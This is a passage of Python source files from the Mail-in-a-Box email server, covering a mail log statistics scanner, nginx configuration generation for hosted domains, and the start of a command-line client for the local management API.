if VERBOSE: print("Processing file", fn, "...") fn = tmp_file.name if tmp_file else fn for line in readline(fn): if scan_mail_log_line(line.strip(), collector) is False: if stop_scan: return stop_scan = True else: stop_scan = False def scan_mail_log(env): """ Scan the system's mail log files and collect interesting data This function scans the 2 most recent mail log files in /var/log/. Args: env (dict): Dictionary containing MiaB settings """ collector = { "scan_count": 0, # Number of lines scanned "parse_count": 0, # Number of lines parsed (i.e. that had their contents examined) "scan_time": time.time(), # The time in seconds the scan took "sent_mail": OrderedDict(), # Data about email sent by users "received_mail": OrderedDict(), # Data about email received by users "logins": OrderedDict(), # Data about login activity "postgrey": {}, # Data about greylisting of email addresses "rejected": OrderedDict(), # Emails that were blocked "known_addresses": None, # Addresses handled by the Miab installation "other-services": set(), } try: import mailconfig collector["known_addresses"] = (set(mailconfig.get_mail_users(env)) | {alias[0] for alias in mailconfig.get_mail_aliases(env)}) except ImportError: pass print(f"Scanning logs from {START_DATE:%Y-%m-%d %H:%M:%S} to {END_DATE:%Y-%m-%d %H:%M:%S}" ) # Scan the lines in the log files until the date goes out of range scan_files(collector) if not collector["scan_count"]: print("No log lines scanned...") return collector["scan_time"] = time.time() - collector["scan_time"] print("{scan_count} Log lines scanned, {parse_count} lines parsed in {scan_time:.2f} " "seconds\n".format(**collector)) # Print Sent Mail report if collector["sent_mail"]: msg = "Sent email" print_header(msg) data = OrderedDict(sorted(collector["sent_mail"].items(), key=email_sort)) print_user_table( data.keys(), data=[ ("sent", [u["sent_count"] for u in data.values()]), ("hosts", [len(u["hosts"]) for u in data.values()]), ], sub_data=[ ("sending hosts", [u["hosts"] for u in data.values()]), ], activity=[ ("sent", [u["activity-by-hour"] for u in data.values()]), ], earliest=[u["earliest"] for u in data.values()], latest=[u["latest"] for u in data.values()], ) accum = defaultdict(int) data = collector["sent_mail"].values() for h in range(24): accum[h] = sum(d["activity-by-hour"][h] for d in data) print_time_table( ["sent"], [accum] ) # Print Received Mail report if collector["received_mail"]: msg = "Received email" print_header(msg) data = OrderedDict(sorted(collector["received_mail"].items(), key=email_sort)) print_user_table( data.keys(), data=[ ("received", [u["received_count"] for u in data.values()]), ], activity=[ ("sent", [u["activity-by-hour"] for u in data.values()]), ], earliest=[u["earliest"] for u in data.values()], latest=[u["latest"] for u in data.values()], ) accum = defaultdict(int) for h in range(24): accum[h] = sum(d["activity-by-hour"][h] for d in data.values()) print_time_table( ["received"], [accum] ) # Print login report if collector["logins"]: msg = "User logins per hour" print_header(msg) data = OrderedDict(sorted(collector["logins"].items(), key=email_sort)) # Get a list of all of the protocols seen in the logs in reverse count order. 
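		# Hedged illustration of the per-user shape built by add_login() during
		# scanning (counts invented): u["totals_by_protocol"] might look like
		#   {"imap": 142, "pop3": 3, "smtp": 27}
		# where "imap"/"pop3" come from the Dovecot "*-login" service names
		# (truncated to four characters) and "smtp" is recorded for
		# authenticated submissions.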
all_protocols = defaultdict(int) for u in data.values(): for protocol_name, count in u["totals_by_protocol"].items(): all_protocols[protocol_name] += count all_protocols = [k for k, v in sorted(all_protocols.items(), key=lambda kv : -kv[1])] print_user_table( data.keys(), data=[ (protocol_name, [ round(u["totals_by_protocol"][protocol_name] / (u["latest"]-u["earliest"]).total_seconds() * 60*60, 1) if (u["latest"]-u["earliest"]).total_seconds() > 0 else 0 # prevent division by zero for u in data.values()]) for protocol_name in all_protocols ], sub_data=[ ("Protocol and Source", [[ f"{protocol_name} {host}: {count} times" for (protocol_name, host), count in sorted(u["totals_by_protocol_and_host"].items(), key=lambda kv:-kv[1]) ] for u in data.values()]) ], activity=[ (protocol_name, [u["activity-by-hour"][protocol_name] for u in data.values()]) for protocol_name in all_protocols ], earliest=[u["earliest"] for u in data.values()], latest=[u["latest"] for u in data.values()], numstr=lambda n : str(round(n, 1)), ) accum = { protocol_name: defaultdict(int) for protocol_name in all_protocols } for h in range(24): for protocol_name in all_protocols: accum[protocol_name][h] = sum(d["activity-by-hour"][protocol_name][h] for d in data.values()) print_time_table( all_protocols, [accum[protocol_name] for protocol_name in all_protocols] ) if collector["postgrey"]: msg = "Greylisted Email {:%Y-%m-%d %H:%M:%S} and {:%Y-%m-%d %H:%M:%S}" print_header(msg.format(START_DATE, END_DATE)) print(textwrap.fill( "The following mail was greylisted, meaning the emails were temporarily rejected. " "Legitimate senders must try again after three minutes.", width=80, initial_indent=" ", subsequent_indent=" " ), end='\n\n') data = OrderedDict(sorted(collector["postgrey"].items(), key=email_sort)) users = [] received = [] senders = [] sender_clients = [] delivered_dates = [] for recipient in data: sorted_recipients = sorted(data[recipient].items(), key=lambda kv: kv[1][0] or kv[1][1]) for (client_address, sender), (first_date, delivered_date) in sorted_recipients: if first_date: users.append(recipient) received.append(first_date) senders.append(sender) delivered_dates.append(delivered_date) sender_clients.append(client_address) print_user_table( users, data=[ ("received", received), ("sender", senders), ("delivered", [str(d) or "no retry yet" for d in delivered_dates]), ("sending host", sender_clients) ], delimit=True, ) if collector["rejected"]: msg = "Blocked Email {:%Y-%m-%d %H:%M:%S} and {:%Y-%m-%d %H:%M:%S}" print_header(msg.format(START_DATE, END_DATE)) data = OrderedDict(sorted(collector["rejected"].items(), key=email_sort)) rejects = [] if VERBOSE: for user_data in data.values(): user_rejects = [] for date, sender, message in user_data["blocked"]: if len(sender) > 64: sender = sender[:32] + "…" + sender[-32:] user_rejects.extend((f'{date} - {sender} ', ' %s' % message)) rejects.append(user_rejects) print_user_table( data.keys(), data=[ ("blocked", [len(u["blocked"]) for u in data.values()]), ], sub_data=[ ("blocked emails", rejects), ], earliest=[u["earliest"] for u in data.values()], latest=[u["latest"] for u in data.values()], ) if collector["other-services"] and VERBOSE and False: print_header("Other services") print("The following unknown services were found in the log file.") print(" ", *sorted(collector["other-services"]), sep='\n│ ') def scan_mail_log_line(line, collector): """ Scan a log line and extract interesting data """ m = re.match(r"(\w+[\s]+\d+ \d+:\d+:\d+) ([\w]+ )?([\w\-/]+)[^:]*: (.*)", line) if 
not m: return True date, _system, service, log = m.groups() collector["scan_count"] += 1 # print() # print("date:", date) # print("host:", system) # print("service:", service) # print("log:", log) # Replaced the dateutil parser for a less clever way of parser that is roughly 4 times faster. # date = dateutil.parser.parse(date) # strptime fails on Feb 29 with ValueError: day is out of range for month if correct year is not provided. # See https://bugs.python.org/issue26460 date = datetime.datetime.strptime(str(NOW.year) + ' ' + date, '%Y %b %d %H:%M:%S') # if log date in future, step back a year if date > NOW: date = date.replace(year = NOW.year - 1) #print("date:", date) # Check if the found date is within the time span we are scanning if date > END_DATE: # Don't process, and halt return False elif date < START_DATE: # Don't process, but continue return True if service == "postfix/submission/smtpd": if SCAN_OUT: scan_postfix_submission_line(date, log, collector) elif service == "postfix/lmtp": if SCAN_IN: scan_postfix_lmtp_line(date, log, collector) elif service.endswith("-login"): if SCAN_DOVECOT_LOGIN: scan_dovecot_login_line(date, log, collector, service[:4]) elif service == "postgrey": if SCAN_GREY: scan_postgrey_line(date, log, collector) elif service == "postfix/smtpd": if SCAN_BLOCKED: scan_postfix_smtpd_line(date, log, collector) elif service in {"postfix/qmgr", "postfix/pickup", "postfix/cleanup", "postfix/scache", "spampd", "postfix/anvil", "postfix/master", "opendkim", "postfix/lmtp", "postfix/tlsmgr", "anvil"}: # nothing to look at return True else: collector["other-services"].add(service) return True collector["parse_count"] += 1 return True def scan_postgrey_line(date, log, collector): """ Scan a postgrey log line and extract interesting data """ m = re.match(r"action=(greylist|pass), reason=(.*?), (?:delay=\d+, )?client_name=(.*), " "client_address=(.*), sender=(.*), recipient=(.*)", log) if m: action, reason, client_name, client_address, sender, user = m.groups() if user_match(user): # Might be useful to group services that use a lot of mail different servers on sub # domains like <sub>1.domein.com # if '.' 
in client_name: # addr = client_name.split('.') # if len(addr) > 2: # client_name = '.'.join(addr[1:]) key = (client_address if client_name == 'unknown' else client_name, sender) rep = collector["postgrey"].setdefault(user, {}) if action == "greylist" and reason == "new": rep[key] = (date, rep[key][1] if key in rep else None) elif action == "pass": rep[key] = (rep[key][0] if key in rep else None, date) def scan_postfix_smtpd_line(date, log, collector): """ Scan a postfix smtpd log line and extract interesting data """ # Check if the incoming mail was rejected m = re.match("NOQUEUE: reject: RCPT from .*?: (.*?); from=<(.*?)> to=<(.*?)>", log) if m: message, sender, user = m.groups() # skip this, if reported in the greylisting report if "Recipient address rejected: Greylisted" in message: return # only log mail to known recipients if user_match(user) and (collector["known_addresses"] is None or user in collector["known_addresses"]): data = collector["rejected"].get( user, { "blocked": [], "earliest": None, "latest": None, } ) # simplify this one m = re.search( r"Client host \[(.*?)\] blocked using zen.spamhaus.org; (.*)", message ) if m: message = "ip blocked: " + m.group(2) else: # simplify this one too m = re.search( r"Sender address \[.*@(.*)\] blocked using dbl.spamhaus.org; (.*)", message ) if m: message = "domain blocked: " + m.group(2) if data["earliest"] is None: data["earliest"] = date data["latest"] = date data["blocked"].append((date, sender, message)) collector["rejected"][user] = data def scan_dovecot_login_line(date, log, collector, protocol_name): """ Scan a dovecot login log line and extract interesting data """ m = re.match("Info: Login: user=<(.*?)>, method=PLAIN, rip=(.*?),", log) if m: # TODO: CHECK DIT user, host = m.groups() if user_match(user): add_login(user, date, protocol_name, host, collector) def add_login(user, date, protocol_name, host, collector): # Get the user data, or create it if the user is new data = collector["logins"].get( user, { "earliest": None, "latest": None, "totals_by_protocol": defaultdict(int), "totals_by_protocol_and_host": defaultdict(int), "activity-by-hour": defaultdict(lambda : defaultdict(int)), } ) if data["earliest"] is None: data["earliest"] = date data["latest"] = date data["totals_by_protocol"][protocol_name] += 1 data["totals_by_protocol_and_host"][(protocol_name, host)] += 1 if host not in {"127.0.0.1", "::1"} or True: data["activity-by-hour"][protocol_name][date.hour] += 1 collector["logins"][user] = data def scan_postfix_lmtp_line(date, log, collector): """ Scan a postfix lmtp log line and extract interesting data It is assumed that every log of postfix/lmtp indicates an email that was successfully received by Postfix. """ m = re.match(r"([A-Z0-9]+): to=<(\S+)>, .* Saved", log) if m: _, user = m.groups() if user_match(user): # Get the user data, or create it if the user is new data = collector["received_mail"].get( user, { "received_count": 0, "earliest": None, "latest": None, "activity-by-hour": defaultdict(int), } ) data["received_count"] += 1 data["activity-by-hour"][date.hour] += 1 if data["earliest"] is None: data["earliest"] = date data["latest"] = date collector["received_mail"][user] = data def scan_postfix_submission_line(date, log, collector): """ Scan a postfix submission log line and extract interesting data Lines containing a sasl_method with the values PLAIN or LOGIN are assumed to indicate a sent email. 
""" # Match both the 'plain' and 'login' sasl methods, since both authentication methods are # allowed by Dovecot. Exclude trailing comma after the username when additional fields # follow after. m = re.match(r"([A-Z0-9]+): client=(\S+), sasl_method=(PLAIN|LOGIN), sasl_username=(\S+)(?<!,)", log) if m: _, client, _method, user = m.groups() if user_match(user): # Get the user data, or create it if the user is new data = collector["sent_mail"].get( user, { "sent_count": 0, "hosts": set(), "earliest": None, "latest": None, "activity-by-hour": defaultdict(int), } ) data["sent_count"] += 1 data["hosts"].add(client) data["activity-by-hour"][date.hour] += 1 if data["earliest"] is None: data["earliest"] = date data["latest"] = date collector["sent_mail"][user] = data # Also log this as a login. add_login(user, date, "smtp", client, collector) # Utility functions def readline(filename): """ A generator that returns the lines of a file """ with open(filename, errors='replace', encoding='utf-8') as file: while True: line = file.readline() if not line: break yield line def user_match(user): """ Check if the given user matches any of the filters """ return FILTERS is None or any(u in user for u in FILTERS) def email_sort(email): """ Split the given email address into a reverse order tuple, for sorting i.e (domain, name) """ return tuple(reversed(email[0].split('@'))) def valid_date(string): """ Validate the given date string fetched from the --enddate argument """ try: date = dateutil.parser.parse(string) except ValueError: raise argparse.ArgumentTypeError("Unrecognized date and/or time '%s'" % string) return date # Print functions def print_time_table(labels, data, do_print=True): labels.insert(0, "hour") data.insert(0, [str(h) for h in range(24)]) temp = "│ {:<%d} " % max(len(l) for l in labels) lines = [temp.format(label) for label in labels] for h in range(24): max_len = max(len(str(d[h])) for d in data) base = "{:>%d} " % max(2, max_len) for i, d in enumerate(data): lines[i] += base.format(d[h]) lines.insert(0, "┬ totals by time of day:") lines.append("└" + (len(lines[-1]) - 2) * "─") if do_print: print("\n".join(lines)) return None else: return lines def print_user_table(users, data=None, sub_data=None, activity=None, latest=None, earliest=None, delimit=False, numstr=str): str_temp = "{:<32} " lines = [] data = data or [] col_widths = len(data) * [0] col_left = len(data) * [False] vert_pos = 0 do_accum = all(isinstance(n, (int, float)) for _, d in data for n in d) data_accum = len(data) * ([0] if do_accum else [" "]) last_user = None for row, user in enumerate(users): if delimit: if last_user and last_user != user: lines.append(len(lines[-1]) * "…") last_user = user line = "{:<32} ".format(user[:31] + "…" if len(user) > 32 else user) for col, (l, d) in enumerate(data): if isinstance(d[row], str): col_str = str_temp.format(d[row][:31] + "…" if len(d[row]) > 32 else d[row]) col_left[col] = True elif isinstance(d[row], datetime.datetime): col_str = f"{d[row]!s:<20}" col_left[col] = True else: temp = "{:>%s}" % max(5, len(l) + 1, len(str(d[row])) + 1) col_str = temp.format(str(d[row])) col_widths[col] = max(col_widths[col], len(col_str)) line += col_str if do_accum: data_accum[col] += d[row] try: if None not in [latest, earliest]: # noqa PLR6201 vert_pos = len(line) e = earliest[row] l = latest[row] timespan = relativedelta(l, e) if timespan.months: temp = " │ {:0.1f} months" line += temp.format(timespan.months + timespan.days / 30.0) elif timespan.days: temp = " │ {:0.1f} days" line += 
temp.format(timespan.days + timespan.hours / 24.0) elif (e.hour, e.minute) == (l.hour, l.minute): temp = " │ {:%H:%M}" line += temp.format(e) else: temp = " │ {:%H:%M} - {:%H:%M}" line += temp.format(e, l) except KeyError: pass lines.append(line.rstrip()) try: if VERBOSE: if sub_data is not None: for l, d in sub_data: if d[row]: lines.extend(('┬', '│ %s' % l, '├─%s─' % (len(l) * '─'), '│')) max_len = 0 for v in list(d[row]): lines.append("│ %s" % v) max_len = max(max_len, len(v)) lines.append("└" + (max_len + 1) * "─") if activity is not None: lines.extend(print_time_table( [label for label, _ in activity], [data[row] for _, data in activity], do_print=False )) except KeyError: pass header = str_temp.format("") for col, (l, _) in enumerate(data): if col_left[col]: header += l.ljust(max(5, len(l) + 1, col_widths[col])) else: header += l.rjust(max(5, len(l) + 1, col_widths[col])) if None not in [latest, earliest]: # noqa PLR6201 header += " │ timespan " lines.insert(0, header.rstrip()) table_width = max(len(l) for l in lines) t_line = table_width * "─" b_line = table_width * "─" if vert_pos: t_line = t_line[:vert_pos + 1] + "┼" + t_line[vert_pos + 2:] b_line = b_line[:vert_pos + 1] + ("┬" if VERBOSE else "┼") + b_line[vert_pos + 2:] lines.insert(1, t_line) lines.append(b_line) # Print totals data_accum = [numstr(a) for a in data_accum] footer = str_temp.format("Totals:" if do_accum else " ") for row, (l, _) in enumerate(data): temp = "{:>%d}" % max(5, len(l) + 1) footer += temp.format(data_accum[row]) try: if None not in [latest, earliest]: # noqa PLR6201 max_l = max(latest) min_e = min(earliest) timespan = relativedelta(max_l, min_e) if timespan.days: temp = " │ {:0.2f} days" footer += temp.format(timespan.days + timespan.hours / 24.0) elif (min_e.hour, min_e.minute) == (max_l.hour, max_l.minute): temp = " │ {:%H:%M}" footer += temp.format(min_e) else: temp = " │ {:%H:%M} - {:%H:%M}" footer += temp.format(min_e, max_l) except KeyError: pass lines.append(footer) print("\n".join(lines)) def print_header(msg): print('\n' + msg) print("═" * len(msg), '\n') if __name__ == "__main__": try: env_vars = utils.load_environment() except FileNotFoundError: env_vars = {} parser = argparse.ArgumentParser( description="Scan the mail log files for interesting data. By default, this script " "shows today's incoming and outgoing mail statistics. This script was (" "re)written for the Mail-in-a-box email server." "https://github.com/mail-in-a-box/mailinabox", add_help=False ) # Switches to determine what to parse and what to ignore parser.add_argument("-r", "--received", help="Scan for received emails.", action="store_true") parser.add_argument("-s", "--sent", help="Scan for sent emails.", action="store_true") parser.add_argument("-l", "--logins", help="Scan for user logins to IMAP/POP3.", action="store_true") parser.add_argument("-g", "--grey", help="Scan for greylisted emails.", action="store_true") parser.add_argument("-b", "--blocked", help="Scan for blocked emails.", action="store_true") parser.add_argument("-t", "--timespan", choices=TIME_DELTAS.keys(), default='today', metavar='<time span>', help="Time span to scan, going back from the end date. Possible values: " "{}. Defaults to 'today'.".format(", ".join(list(TIME_DELTAS.keys())))) # keep the --startdate arg for backward compatibility parser.add_argument("-d", "--enddate", "--startdate", action="store", dest="enddate", type=valid_date, metavar='<end date>', help="Date and time to end scanning the log file. 
If no date is " "provided, scanning will end at the current date and time. " "Alias --startdate is for compatibility.") parser.add_argument("-u", "--users", action="store", dest="users", metavar='<email1,email2,email...>', help="Comma separated list of (partial) email addresses to filter the " "output with.") parser.add_argument('-h', '--help', action='help', help="Print this message and exit.") parser.add_argument("-v", "--verbose", help="Output extra data where available.", action="store_true") args = parser.parse_args() if args.enddate is not None: END_DATE = args.enddate if args.timespan == 'today': args.timespan = 'day' print(f"Setting end date to {END_DATE}") START_DATE = END_DATE - TIME_DELTAS[args.timespan] VERBOSE = args.verbose if args.received or args.sent or args.logins or args.grey or args.blocked: SCAN_IN = args.received if not SCAN_IN: print("Ignoring received emails") SCAN_OUT = args.sent if not SCAN_OUT: print("Ignoring sent emails") SCAN_DOVECOT_LOGIN = args.logins if not SCAN_DOVECOT_LOGIN: print("Ignoring logins") SCAN_GREY = args.grey if SCAN_GREY: print("Showing greylisted emails") SCAN_BLOCKED = args.blocked if SCAN_BLOCKED: print("Showing blocked emails") if args.users is not None: FILTERS = args.users.strip().split(',') scan_mail_log(env_vars) File: management/web_update.py # Creates an nginx configuration file so we serve HTTP/HTTPS on all # domains for which a mail account has been set up. ######################################################################## import os.path, re, rtyaml from mailconfig import get_mail_domains from dns_update import get_custom_dns_config, get_dns_zones from ssl_certificates import get_ssl_certificates, get_domain_ssl_files, check_certificate from utils import shell, safe_domain_name, sort_domains def get_web_domains(env, include_www_redirects=True, include_auto=True, exclude_dns_elsewhere=True): # What domains should we serve HTTP(S) for? domains = set() # Serve web for all mail domains so that we might at least # provide auto-discover of email settings, and also a static website # if the user wants to make one. domains |= get_mail_domains(env) if include_www_redirects and include_auto: # Add 'www.' subdomains that we want to provide default redirects # to the main domain for. We'll add 'www.' to any DNS zones, i.e. # the topmost of each domain we serve. domains |= {'www.' + zone for zone, zonefile in get_dns_zones(env)} if include_auto: # Add Autoconfiguration domains for domains that there are user accounts at: # 'autoconfig.' for Mozilla Thunderbird auto setup. # 'autodiscover.' for ActiveSync autodiscovery (Z-Push). domains |= {'autoconfig.' + maildomain for maildomain in get_mail_domains(env, users_only=True)} domains |= {'autodiscover.' + maildomain for maildomain in get_mail_domains(env, users_only=True)} # 'mta-sts.' for MTA-STS support for all domains that have email addresses. domains |= {'mta-sts.' + maildomain for maildomain in get_mail_domains(env)} if exclude_dns_elsewhere: # ...Unless the domain has an A/AAAA record that maps it to a different # IP address than this box. Remove those domains from our list. domains -= get_domains_with_a_records(env) # Ensure the PRIMARY_HOSTNAME is in the list so we can serve webmail # as well as Z-Push for Exchange ActiveSync. This can't be removed # by a custom A/AAAA record and is never a 'www.' redirect. domains.add(env['PRIMARY_HOSTNAME']) # Sort the list so the nginx conf gets written in a stable order. 
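	# Illustrative result (hypothetical domain): for a box whose PRIMARY_HOSTNAME
	# is box.example.com and which hosts user accounts @example.com, the returned
	# list typically includes example.com, www.example.com, autoconfig.example.com,
	# autodiscover.example.com and mta-sts.example.com alongside the primary
	# hostname's own entries, minus anything excluded above because its A/AAAA
	# records point elsewhere.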
return sort_domains(domains, env) def get_domains_with_a_records(env): domains = set() dns = get_custom_dns_config(env) for domain, rtype, value in dns: if rtype == "CNAME" or (rtype in {"A", "AAAA"} and value not in {"local", env['PUBLIC_IP']}): domains.add(domain) return domains def get_web_domains_with_root_overrides(env): # Load custom settings so we can tell what domains have a redirect or proxy set up on '/', # which means static hosting is not happening. root_overrides = { } nginx_conf_custom_fn = os.path.join(env["STORAGE_ROOT"], "www/custom.yaml") if os.path.exists(nginx_conf_custom_fn): with open(nginx_conf_custom_fn, encoding='utf-8') as f: custom_settings = rtyaml.load(f) for domain, settings in custom_settings.items(): for type, value in [('redirect', settings.get('redirects', {}).get('/')), ('proxy', settings.get('proxies', {}).get('/'))]: if value: root_overrides[domain] = (type, value) return root_overrides def do_web_update(env): # Pre-load what SSL certificates we will use for each domain. ssl_certificates = get_ssl_certificates(env) # Helper for reading config files and templates def read_conf(conf_fn): with open(os.path.join(os.path.dirname(__file__), "../conf", conf_fn), encoding='utf-8') as f: return f.read() # Build an nginx configuration file. nginx_conf = read_conf("nginx-top.conf") # Load the templates. template0 = read_conf("nginx.conf") template1 = read_conf("nginx-alldomains.conf") template2 = read_conf("nginx-primaryonly.conf") template3 = "\trewrite ^(.*) https://$REDIRECT_DOMAIN$1 permanent;\n" # Add the PRIMARY_HOST configuration first so it becomes nginx's default server. nginx_conf += make_domain_config(env['PRIMARY_HOSTNAME'], [template0, template1, template2], ssl_certificates, env) # Add configuration all other web domains. has_root_proxy_or_redirect = get_web_domains_with_root_overrides(env) web_domains_not_redirect = get_web_domains(env, include_www_redirects=False) for domain in get_web_domains(env): if domain == env['PRIMARY_HOSTNAME']: # PRIMARY_HOSTNAME is handled above. continue if domain in web_domains_not_redirect: # This is a regular domain. if domain not in has_root_proxy_or_redirect: nginx_conf += make_domain_config(domain, [template0, template1], ssl_certificates, env) else: nginx_conf += make_domain_config(domain, [template0], ssl_certificates, env) else: # Add default 'www.' redirect. nginx_conf += make_domain_config(domain, [template0, template3], ssl_certificates, env) # Did the file change? If not, don't bother writing & restarting nginx. nginx_conf_fn = "/etc/nginx/conf.d/local.conf" if os.path.exists(nginx_conf_fn): with open(nginx_conf_fn, encoding='utf-8') as f: if f.read() == nginx_conf: return "" # Save the file. with open(nginx_conf_fn, "w", encoding='utf-8') as f: f.write(nginx_conf) # Kick nginx. Since this might be called from the web admin # don't do a 'restart'. That would kill the connection before # the API returns its response. A 'reload' should be good # enough and doesn't break any open connections. shell('check_call', ["/usr/sbin/service", "nginx", "reload"]) return "web updated\n" def make_domain_config(domain, templates, ssl_certificates, env): # GET SOME VARIABLES # Where will its root directory be for static files? root = get_web_root(domain, env) # What private key and SSL certificate will we use for this domain? tls_cert = get_domain_ssl_files(domain, ssl_certificates, env) # ADDITIONAL DIRECTIVES. 
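	# Sketch of the www/custom.yaml structure consumed below (the domain, paths
	# and URLs are illustrative, not defaults shipped with the box):
	#
	#   example.com:
	#       proxies:
	#           /app: http://127.0.0.1:8000#pass-http-host
	#       redirects:
	#           /old-page: /new-page
	#       aliases:
	#           /downloads: /home/user-data/www/downloads
	#       hsts: preload
	#
	# The URL fragment after "#" carries flags parsed below (pass-http-host,
	# no-proxy-redirect, frame-options-sameorigin, web-sockets).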
nginx_conf_extra = "" # Because the certificate may change, we should recognize this so we # can trigger an nginx update. def hashfile(filepath): import hashlib sha1 = hashlib.sha1() with open(filepath, 'rb') as f: sha1.update(f.read()) return sha1.hexdigest() nginx_conf_extra += "\t# ssl files sha1: {} / {}\n".format(hashfile(tls_cert["private-key"]), hashfile(tls_cert["certificate"])) # Add in any user customizations in YAML format. hsts = "yes" nginx_conf_custom_fn = os.path.join(env["STORAGE_ROOT"], "www/custom.yaml") if os.path.exists(nginx_conf_custom_fn): with open(nginx_conf_custom_fn, encoding='utf-8') as f: yaml = rtyaml.load(f) if domain in yaml: yaml = yaml[domain] # any proxy or redirect here? for path, url in yaml.get("proxies", {}).items(): # Parse some flags in the fragment of the URL. pass_http_host_header = False proxy_redirect_off = False frame_options_header_sameorigin = False web_sockets = False m = re.search("#(.*)$", url) if m: for flag in m.group(1).split(","): if flag == "pass-http-host": pass_http_host_header = True elif flag == "no-proxy-redirect": proxy_redirect_off = True elif flag == "frame-options-sameorigin": frame_options_header_sameorigin = True elif flag == "web-sockets": web_sockets = True url = re.sub("#(.*)$", "", url) nginx_conf_extra += "\tlocation %s {" % path nginx_conf_extra += "\n\t\tproxy_pass %s;" % url if proxy_redirect_off: nginx_conf_extra += "\n\t\tproxy_redirect off;" if pass_http_host_header: nginx_conf_extra += "\n\t\tproxy_set_header Host $http_host;" if frame_options_header_sameorigin: nginx_conf_extra += "\n\t\tproxy_set_header X-Frame-Options SAMEORIGIN;" if web_sockets: nginx_conf_extra += "\n\t\tproxy_http_version 1.1;" nginx_conf_extra += "\n\t\tproxy_set_header Upgrade $http_upgrade;" nginx_conf_extra += "\n\t\tproxy_set_header Connection 'Upgrade';" nginx_conf_extra += "\n\t\tproxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;" nginx_conf_extra += "\n\t\tproxy_set_header X-Forwarded-Host $http_host;" nginx_conf_extra += "\n\t\tproxy_set_header X-Forwarded-Proto $scheme;" nginx_conf_extra += "\n\t\tproxy_set_header X-Real-IP $remote_addr;" nginx_conf_extra += "\n\t}\n" for path, alias in yaml.get("aliases", {}).items(): nginx_conf_extra += "\tlocation %s {" % path nginx_conf_extra += "\n\t\talias %s;" % alias nginx_conf_extra += "\n\t}\n" for path, url in yaml.get("redirects", {}).items(): nginx_conf_extra += f"\trewrite {path} {url} permanent;\n" # override the HSTS directive type hsts = yaml.get("hsts", hsts) # Add the HSTS header. if hsts == "yes": nginx_conf_extra += '\tadd_header Strict-Transport-Security "max-age=15768000" always;\n' elif hsts == "preload": nginx_conf_extra += '\tadd_header Strict-Transport-Security "max-age=15768000; includeSubDomains; preload" always;\n' # Add in any user customizations in the includes/ folder. nginx_conf_custom_include = os.path.join(env["STORAGE_ROOT"], "www", safe_domain_name(domain) + ".conf") if os.path.exists(nginx_conf_custom_include): nginx_conf_extra += "\tinclude %s;\n" % (nginx_conf_custom_include) # PUT IT ALL TOGETHER # Combine the pieces. Iteratively place each template into the "# ADDITIONAL DIRECTIVES HERE" placeholder # of the previous template. nginx_conf = "# ADDITIONAL DIRECTIVES HERE\n" for t in [*templates, nginx_conf_extra]: nginx_conf = re.sub("[ \t]*# ADDITIONAL DIRECTIVES HERE *\n", t, nginx_conf) # Replace substitution strings in the template & return. 
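	# (Illustration: after the loop above, nginx_conf is the merged template text
	# and still contains literal placeholder strings such as $STORAGE_ROOT,
	# $HOSTNAME, $ROOT, $SSL_KEY, $SSL_CERTIFICATE and $REDIRECT_DOMAIN; the
	# replace() calls below substitute the per-domain values.)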
nginx_conf = nginx_conf.replace("$STORAGE_ROOT", env['STORAGE_ROOT']) nginx_conf = nginx_conf.replace("$HOSTNAME", domain) nginx_conf = nginx_conf.replace("$ROOT", root) nginx_conf = nginx_conf.replace("$SSL_KEY", tls_cert["private-key"]) nginx_conf = nginx_conf.replace("$SSL_CERTIFICATE", tls_cert["certificate"]) return nginx_conf.replace("$REDIRECT_DOMAIN", re.sub(r"^www\.", "", domain)) # for default www redirects to parent domain def get_web_root(domain, env, test_exists=True): # Try STORAGE_ROOT/web/domain_name if it exists, but fall back to STORAGE_ROOT/web/default. for test_domain in (domain, 'default'): root = os.path.join(env["STORAGE_ROOT"], "www", safe_domain_name(test_domain)) if os.path.exists(root) or not test_exists: break return root def get_web_domains_info(env): www_redirects = set(get_web_domains(env)) - set(get_web_domains(env, include_www_redirects=False)) has_root_proxy_or_redirect = set(get_web_domains_with_root_overrides(env)) ssl_certificates = get_ssl_certificates(env) # for the SSL config panel, get cert status def check_cert(domain): try: tls_cert = get_domain_ssl_files(domain, ssl_certificates, env, allow_missing_cert=True) except OSError: # PRIMARY_HOSTNAME cert is missing tls_cert = None if tls_cert is None: return ("danger", "No certificate installed.") cert_status, cert_status_details = check_certificate(domain, tls_cert["certificate"], tls_cert["private-key"]) if cert_status == "OK": return ("success", "Signed & valid. " + cert_status_details) elif cert_status == "SELF-SIGNED": return ("warning", "Self-signed. Get a signed certificate to stop warnings.") else: return ("danger", "Certificate has a problem: " + cert_status) return [ { "domain": domain, "root": get_web_root(domain, env), "custom_root": get_web_root(domain, env, test_exists=False), "ssl_certificate": check_cert(domain), "static_enabled": domain not in (www_redirects | has_root_proxy_or_redirect), } for domain in get_web_domains(env) ] File: management/cli.py #!/usr/bin/python3 # # This is a command-line script for calling management APIs # on the Mail-in-a-Box control panel backend. The script # reads /var/lib/mailinabox/api.key for the backend's # root API key. This file is readable only by root, so this # tool can only be used as root. import sys, getpass, urllib.request, urllib.error, json, csv import contextlib def mgmt(cmd, data=None, is_json=False): # The base URL for the management daemon. (Listens on IPv4 only.) mgmt_uri = 'http://127.0.0.1:10222' setup_key_auth(mgmt_uri) req = urllib.request.Request(mgmt_uri + cmd, urllib.parse.urlencode(data).encode("utf8") if data else None) try: response = urllib.request.urlopen(req) except urllib.error.HTTPError as e: if e.code == 401: with contextlib.suppress(Exception): print(e.read().decode("utf8")) print("The management daemon refused access. The API key file may be out of sync. Try 'service mailinabox restart'.", file=sys.stderr) elif hasattr(e, 'read'): print(e.read().decode('utf8'), file=sys.stderr) else: print(e, file=sys.stderr) sys.exit(1) resp = response.read().decode('utf8') if is_json: resp = json.loads(resp) return resp def read_password(): while True: first = getpass.getpass('password: ') if len(first) < 8: print("Passwords must be at least eight characters.") continue second = getpass.getpass(' (again): ') if first != second: print("Passwords not the same. 
